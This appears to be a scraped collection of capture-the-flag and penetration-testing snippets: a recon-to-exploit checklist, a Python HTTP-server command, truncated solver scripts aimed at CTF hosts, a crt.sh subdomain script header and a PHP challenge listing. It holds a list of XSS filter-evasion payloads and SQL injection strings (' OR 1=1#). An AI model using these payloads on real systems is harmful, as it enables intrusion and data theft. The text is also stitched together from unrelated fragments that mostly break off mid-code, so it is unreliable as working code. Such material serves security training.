- Recon
- Find vuln
- Exploit
- Document it
Unicornscans in cli, nmap in msfconsole to help store loot in database.
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
import requests | |
import re | |
url = "http://88.198.233.174:33534/index.php" | |
payload = { | |
"username":"", | |
"password":"x", | |
} | |
def check(data): |
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
<img src=1 href=1 onerror="javascript:alert(1)"></img> |
import requests | |
import re | |
#GLOBAL | |
base_url = "http://mezzanine.mysterious-hashes.net/" | |
format_flag = "flag{%s}" | |
#LEVEL 1 | |
payload = { | |
"user": "' OR 1=1#", | |
"pass": "' OR 1=1#" |
#!/bin/bash | |
# | |
# crt.sh sub-domain check by 1N3@CrowdShield | |
# https://crowdshield.com | |
# | |
OKBLUE='\033[94m' | |
OKRED='\033[91m' | |
OKGREEN='\033[92m' | |
OKORANGE='\033[93m' |
You are given a URI (all happens in the http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/
route) that leads to index.php
, the same but ends with index.phps
and is an alleged source code of the former, finally, index.php
contains a link to auth.php
index.phps
listing below
<?php
session_start();
$link = @mysql_connect('localhost', '', '');
@mysql_select_db('', $link);
# coding: utf-8 | |
""" | |
Unfortunately solved 20 minutes after the end of the CTF :( | |
""" | |
import re | |
import sys | |
import string | |
import requests |
from __future__ import division | |
import hashlib | |
import requests | |
from datetime import datetime, timedelta | |
api_url = 'http://rfile.2017.teamrois.cn/api/download/{}/{}' | |
def totimestamp(dt, epoch=datetime(1970,1,1)): | |
td = dt - epoch | |
return (td.microseconds + (td.seconds + td.days * 86400) * 10**6) / 10**6 |
import requests | |
from bs4 import BeautifulSoup | |
url = "https://felicity.iiit.ac.in/contest/extra/fastandfurious/" | |
soup = BeautifulSoup(requests.get(url).text,"lxml") | |
headers = { | |
'user-agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36", | |
'content-type': "application/x-www-form-urlencoded", | |
'accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", |